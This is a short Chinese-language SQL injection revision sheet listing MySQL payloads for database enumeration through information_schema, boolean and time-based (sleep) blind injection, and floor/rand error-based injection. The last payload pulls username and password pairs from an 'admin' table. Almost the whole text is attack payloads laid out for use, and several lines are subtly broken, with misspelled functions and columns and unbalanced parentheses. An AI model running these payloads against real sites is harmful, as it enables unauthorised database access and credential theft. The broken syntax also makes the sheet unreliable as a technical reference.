注入复习笔记
1 #常规注入: 2 select schema_name from information_schema.schemata; 3 select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374; 4 select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374; 5 #盲注: 6 select and ascii(mid(databases(),1,1))=115; 7 select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)); 8 select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1)); 9 #延时盲注: 10 select and if(ascii(substring(database(),1,)),sleep(10),1); 11 select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1)); 12 select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1); 13 #floor报错注入 14 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a); 15 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a); 16 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a); 17 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)